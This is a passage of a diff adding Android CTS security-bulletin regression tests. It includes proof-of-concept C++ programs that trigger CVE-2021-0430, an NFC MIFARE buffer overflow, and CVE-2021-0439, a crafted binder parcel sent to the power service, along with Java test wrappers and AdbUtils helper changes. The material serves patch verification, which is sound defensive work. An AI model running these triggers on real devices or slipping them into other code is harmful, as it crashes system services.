+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2021-0430",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/include",
+ "system/nfc/src/gki/common",
+ "system/nfc/src/nfc/include",
+ "system/nfc/src/gki/ulinux/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
+
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0430/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0430/poc.cpp
new file mode 100644
index 0000000..947f46a
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0430/poc.cpp
@@ -0,0 +1,87 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <nfc_int.h>
+#include <rw_int.h>
+
+#define RW_MFC_STATE_READ_NDEF 0x03
+#define RW_MFC_SUBSTATE_READ_BLOCK 0x03
+
+extern tRW_CB rw_cb;
+
+void GKI_freebuf(void*) {
+}
+
+void GKI_start_timer(uint8_t, int32_t, bool) {
+}
+
+void GKI_stop_timer(uint8_t) {
+}
+
+void cback(tRW_EVENT, tRW_DATA*) {
+}
+
+int main() {
+ tRW_MFC_CB* p_mfc = &rw_cb.tcb.mfc;
+
+ GKI_init();
+ rw_init();
+
+ uint8_t selres = 1;
+ uint8_t uid[MFC_UID_LEN] = { 1 };
+ if (rw_mfc_select(selres, uid) != NFC_STATUS_OK) {
+ return EXIT_FAILURE;
+ }
+
+ p_mfc->state = RW_MFC_STATE_READ_NDEF;
+ p_mfc->substate = RW_MFC_SUBSTATE_READ_BLOCK;
+
+ tNFC_CONN_CB* p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
+
+ tNFC_CONN* p_data = (tNFC_CONN*) malloc(sizeof(tNFC_CONN));
+ if (!p_data) {
+ return EXIT_FAILURE;
+ }
+
+ p_data->data.p_data = (NFC_HDR*) malloc(sizeof(uint8_t) * 16);
+ if (!(p_data->data.p_data)) {
+ free(p_data);
+ return EXIT_FAILURE;
+ }
+
+ p_data->data.status = NFC_STATUS_OK;
+ tNFC_CONN_EVT event = NFC_DATA_CEVT;
+
+ NFC_HDR* mfc_data = (NFC_HDR*) p_data->data.p_data;
+ mfc_data->len = 0x10;
+ mfc_data->offset = 0;
+ p_mfc->ndef_length = 1024;
+ p_mfc->p_ndef_buffer = (uint8_t*) malloc(sizeof(uint8_t) * 16);
+ if (!(p_mfc->p_ndef_buffer)) {
+ free(p_data->data.p_data);
+ free(p_data);
+ return EXIT_FAILURE;
+ }
+
+ rw_cb.p_cback = cback;
+
+ p_cb->p_cback(0, event, p_data);
+
+ free(p_mfc->p_ndef_buffer);
+ free(p_data->data.p_data);
+ free(p_data);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0439/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0439/Android.bp
new file mode 100644
index 0000000..5cfd2f5
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0439/Android.bp
@@ -0,0 +1,31 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2021-0439",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp"
+ ],
+ shared_libs : [
+ "libutils",
+ "libbinder",
+ ],
+ cflags: [
+ "-DDO_NOT_CHECK_MANUAL_BINDER_INTERFACES",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0439/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0439/poc.cpp
new file mode 100644
index 0000000..65cab13
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0439/poc.cpp
@@ -0,0 +1,49 @@
+/*
+ * Copyright 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <binder/IServiceManager.h>
+#include <binder/Parcel.h>
+
+using namespace android;
+
+int main() {
+ sp<IServiceManager> sm = defaultServiceManager();
+ sp<IBinder> binder = sm->getService(String16("power"));
+ if (!binder) {
+ return EXIT_FAILURE;
+ }
+ Parcel data, result;
+ data.writeInterfaceToken(String16("android.os.IPowerManager"));
+ char d[] = {static_cast<char>(0xc9),
+ static_cast<char>(0xa4),
+ 0x10,
+ static_cast<char>(0xd4),
+ 0x00,
+ 0x00,
+ 0x00,
+ 0x00,
+ 0x00,
+ 0x27,
+ 0x00,
+ 0x5a,
+ 0x00,
+ 0x00,
+ 0x00,
+ 0x00};
+ data.write(d, sizeof(d));
+ binder->transact(6, data, &result);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/AdbUtils.java b/hostsidetests/securitybulletin/src/android/security/cts/AdbUtils.java
index a028330..cf48079 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/AdbUtils.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/AdbUtils.java
@@ -23,6 +23,7 @@
import com.android.ddmlib.IShellOutputReceiver;
import com.android.ddmlib.NullOutputReceiver;
import com.android.ddmlib.CollectingOutputReceiver;
+import com.android.tradefed.device.DeviceNotAvailableException;
import com.android.tradefed.device.ITestDevice;
import com.android.tradefed.device.NativeDevice;
import com.android.tradefed.log.LogUtil.CLog;
@@ -34,6 +35,7 @@
import java.io.OutputStream;
import java.util.concurrent.TimeoutException;
import java.util.List;
+import java.util.Map;
import java.util.regex.Pattern;
import java.util.concurrent.TimeUnit;
import java.util.Scanner;
@@ -48,8 +50,9 @@
import java.util.regex.Pattern;
import java.lang.Thread;
+
import static org.junit.Assert.*;
-import junit.framework.Assert;
+import static org.junit.Assume.*;
public class AdbUtils {
@@ -60,6 +63,7 @@
public static class pocConfig {
String binaryName;
String arguments;
+ Map<String, String> envVars;
String inputFilesDestination;
ITestDevice device;
CrashUtils.Config config;
@@ -162,8 +166,25 @@
*/
public static int runPoc(String pocName, ITestDevice device, int timeout,
String arguments, IShellOutputReceiver receiver) throws Exception {
+ return runPoc(pocName, device, timeout, arguments, null, receiver);
+ }
+
+ /**
+ * Pushes and runs a binary with arguments to the selected device and
+ * ignores any of its output.
+ *
+ * @param pocName name of the poc binary
+ * @param device device to be ran on
+ * @param timeout time to wait for output in seconds
+ * @param arguments input arguments for the poc
+ * @param envVars run the poc with environment variables
+ * @param receiver the type of receiver to run against
+ */
+ public static int runPoc(String pocName, ITestDevice device, int timeout,
+ String arguments, Map<String, String> envVars,
+ IShellOutputReceiver receiver) throws Exception {
String remoteFile = String.format("%s%s", TMP_PATH, pocName);
- SecurityTestCase.getPocPusher(device).pushFile(pocName, remoteFile);
+ SecurityTestCase.getPocPusher(device).pushFile(pocName + "_sts", remoteFile);
assertPocExecutable(pocName, device);
if (receiver == null) {
@@ -173,11 +194,26 @@
arguments = "";
}
+ String env = "";
+ if (envVars != null) {
+ StringBuilder sb = new StringBuilder();
+ for (Map.Entry<String, String> entry : envVars.entrySet()) {
+ sb
+ .append(entry.getKey().trim())
+ .append('=')
+ .append(entry.getValue().trim())
+ .append(' ');
+ }
+ env = sb.toString();
+ CLog.i("Running poc '%s' with env variables '%s'", pocName, env);
+ }
+
// since we have to return the exit status AND the poc stdout+stderr we redirect the exit
// status to a file temporarily
String exitStatusFilepath = TMP_PATH + "exit_status";
runCommandLine("rm " + exitStatusFilepath, device); // remove any old exit status
- device.executeShellCommand(TMP_PATH + pocName + " " + arguments +
+ device.executeShellCommand(
+ env + TMP_PATH + pocName + " " + arguments +
"; echo $? > " + exitStatusFilepath, // echo exit status to file
receiver, timeout, TimeUnit.SECONDS, 0);
@@ -411,7 +447,21 @@
*/
public static int runPocGetExitStatus(String pocName, String arguments, ITestDevice device,
int timeout) throws Exception {
- return runPoc(pocName, device, timeout, arguments, null);
+ return runPocGetExitStatus(pocName, arguments, null, device, timeout);
+ }
+
+ /**
+ * Pushes and runs a binary to the device and returns the exit status.
+ * @param pocName name of the poc binary
+ * @param arguments input arguments for the poc
+ * @param envVars run the poc with environment variables
+ * @param device device to be run on
+ * @param timeout time to wait for output in seconds
+ */
+ public static int runPocGetExitStatus(
+ String pocName, String arguments, Map<String, String> envVars,
+ ITestDevice device, int timeout) throws Exception {
+ return runPoc(pocName, device, timeout, arguments, envVars, null);
}
/**
@@ -434,8 +484,22 @@
*/
public static void runPocAssertExitStatusNotVulnerable(String pocName, String arguments,
ITestDevice device, int timeout) throws Exception {
+ runPocGetExitStatus(pocName, arguments, null, device, timeout);
+ }
+
+ /**
+ * Pushes and runs a binary and asserts that the exit status isn't 113: vulnerable.
+ * @param pocName name of the poc binary
+ * @param arguments input arguments for the poc
+ * @param envVars run the poc with environment variables
+ * @param device device to be ran on
+ * @param timeout time to wait for output in seconds
+ */
+ public static void runPocAssertExitStatusNotVulnerable(
+ String pocName, String arguments, Map<String, String> envVars,
+ ITestDevice device, int timeout) throws Exception {
assertTrue("PoC returned exit status 113: vulnerable",
- runPocGetExitStatus(pocName, arguments, device, timeout) != 113);
+ runPocGetExitStatus(pocName, arguments, envVars, device, timeout) != 113);
}
/**
@@ -579,8 +643,33 @@
public static void runPocAssertNoCrashesNotVulnerable(String binaryName, String arguments,
String inputFiles[], String inputFilesDestination, ITestDevice device,
String processPatternStrings[]) throws Exception {
+ runPocAssertNoCrashesNotVulnerable(binaryName, arguments, null,
+ inputFiles, inputFilesDestination, device, processPatternStrings);
+ }
+
+ /**
+ * Runs the poc binary and asserts following 3 conditions.
+ * 1. There are no security crashes in the binary.
+ * 2. There are no security crashes that match the expected process pattern.
+ * 3. The exit status isn't 113 (Code 113 is used to indicate the vulnerability condition).
+ *
+ * @param binaryName name of the binary
+ * @param arguments arguments for running the binary
+ * @param envVars run the poc with environment variables
+ * @param inputFiles files required as input
+ * @param inputFilesDestination destination directory to which input files are
+ * pushed
+ * @param device device to be run on
+ * @param processPatternStrings a Pattern string (other than binary name) to match the crash
+ * tombstone process
+ */
+ public static void runPocAssertNoCrashesNotVulnerable(
+ String binaryName, String arguments, Map<String, String> envVars,
+ String inputFiles[], String inputFilesDestination, ITestDevice device,
+ String... processPatternStrings) throws Exception {
pocConfig testConfig = new pocConfig(binaryName, device);
testConfig.arguments = arguments;
+ testConfig.envVars = envVars;
if (inputFiles != null) {
testConfig.inputFiles = Arrays.asList(inputFiles);
@@ -617,7 +706,7 @@
runCommandLine("logcat -c", testConfig.device);
try {
runPocAssertExitStatusNotVulnerable(testConfig.binaryName, testConfig.arguments,
- testConfig.device, TIMEOUT_SEC);
+ testConfig.envVars, testConfig.device, TIMEOUT_SEC);
} catch (IllegalArgumentException e) {
/*
* Since 'runPocGetExitStatus' method raises IllegalArgumentException upon
@@ -686,5 +775,9 @@
} catch (JSONException e) {}
}
fail(error.toString());
- }
+ }
+
+ public static void assumeHasNfc(ITestDevice device) throws DeviceNotAvailableException {
+ assumeTrue("nfc not available on device", device.hasFeature("android.hardware.nfc"));
+ }
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2016_2182.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2016_2182.java
new file mode 100644
index 0000000..e6e1015
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2016_2182.java
@@ -0,0 +1,42 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.compatibility.common.util.CrashUtils;
+import static org.junit.Assume.assumeFalse;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2016_2182 extends SecurityTestCase {
+
+ /**
+ * b/32096880
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2017-03")
+ @Test
+ public void testPocCVE_2016_2182() throws Exception {
+ assumeFalse(moduleIsPlayManaged("com.google.android.conscrypt"));
+ String binaryName = "CVE-2016-2182";
+ AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig(binaryName, getDevice());
+ testConfig.config = new CrashUtils.Config().setProcessPatterns(binaryName);
+ testConfig.config.checkMinAddress(false);
+ AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig);
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_13194.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_13194.java
new file mode 100644
index 0000000..ab83ce3
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_13194.java
@@ -0,0 +1,42 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import static org.junit.Assert.*;
+import static org.junit.Assume.*;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2017_13194 extends SecurityTestCase {
+
+ /**
+ * b/64710201
+ * Vulnerability Behaviour: SIGSEGV in media.codec
+ */
+ @SecurityTest(minPatchLevel = "2018-01")
+ @Test
+ public void testPocCVE_2017_13194() throws Exception {
+ assumeFalse(moduleIsPlayManaged("com.google.android.media.swcodec"));
+ pocPusher.only64();
+ String processPatternStrings[] = {"media\\.codec", "omx@\\d+?\\.\\d+?-service"};
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2017-13194", null, getDevice(),
+ processPatternStrings);
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9558.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9558.java
new file mode 100644
index 0000000..6f1c03f
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9558.java
@@ -0,0 +1,45 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.compatibility.common.util.CrashUtils;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2018_9558 extends SecurityTestCase {
+
+ /**
+ * b/112161557
+ * Vulnerability Behaviour: SIGABRT in self
+ */
+ @SecurityTest(minPatchLevel = "2018-12")
+ @Test
+ public void testPocCVE_2018_9558() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ String binaryName = "CVE-2018-9558";
+ String signals[] = {CrashUtils.SIGSEGV, CrashUtils.SIGBUS, CrashUtils.SIGABRT};
+ AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig(binaryName, getDevice());
+ testConfig.config = new CrashUtils.Config().setProcessPatterns(binaryName);
+ testConfig.config.setSignals(signals);
+ AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig);
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9561.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9561.java
new file mode 100644
index 0000000..ad88bb7
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9561.java
@@ -0,0 +1,37 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2018_9561 extends SecurityTestCase {
+
+ /**
+ * b/111660010
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2019-03")
+ @Test
+ public void testPocCVE_2018_9561() throws Exception {
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2018-9561", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9563.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9563.java
new file mode 100644
index 0000000..8f8b53d
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9563.java
@@ -0,0 +1,37 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2018_9563 extends SecurityTestCase {
+
+ /**
+ * b/114237888
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2019-03")
+ @Test
+ public void testPocCVE_2018_9563() throws Exception {
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2018-9563", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9584.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9584.java
new file mode 100644
index 0000000..5d68ce6
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9584.java
@@ -0,0 +1,39 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2018_9584 extends SecurityTestCase {
+
+ /**
+ * b/114047681
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2019-01")
+ @Test
+ public void testPocCVE_2018_9584() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2018-9584", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9585.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9585.java
new file mode 100644
index 0000000..f5d19e4
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9585.java
@@ -0,0 +1,39 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2018_9585 extends SecurityTestCase {
+
+ /**
+ * b/117554809
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2019-01")
+ @Test
+ public void testPocCVE_2018_9585() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2018-9585", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2007.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2007.java
new file mode 100644
index 0000000..718878c
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2007.java
@@ -0,0 +1,36 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2019_2007 extends SecurityTestCase {
+
+ /**
+ * b/120789744
+ * Vulnerability Behaviour: EXIT_VULNERABLE (113)
+ */
+ @SecurityTest(minPatchLevel = "2019-03")
+ @Test
+ public void testPocCVE_2019_2007() throws Exception {
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2007", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2013.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2013.java
new file mode 100644
index 0000000..d2f60c7
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2013.java
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2019_2013 extends SecurityTestCase {
+
+ /**
+ * b/120497583
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2019-03")
+ @Test
+ public void testPocCVE_2019_2013() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2013", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2014.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2014.java
new file mode 100644
index 0000000..c70f560
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2014.java
@@ -0,0 +1,43 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.compatibility.common.util.CrashUtils;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2019_2014 extends SecurityTestCase {
+
+ /**
+ * b/120499324
+ * Vulnerability Behaviour: SIGABRT in self
+ */
+ @SecurityTest(minPatchLevel = "2019-03")
+ @Test
+ public void testPocCVE_2019_2014() throws Exception {
+ pocPusher.only64();
+ String binaryName = "CVE-2019-2014";
+ String signals[] = {CrashUtils.SIGSEGV, CrashUtils.SIGBUS, CrashUtils.SIGABRT};
+ AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig(binaryName, getDevice());
+ testConfig.config = new CrashUtils.Config().setProcessPatterns(binaryName);
+ testConfig.config.setSignals(signals);
+ AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig);
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2019.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2019.java
new file mode 100644
index 0000000..cd61170
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2019.java
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
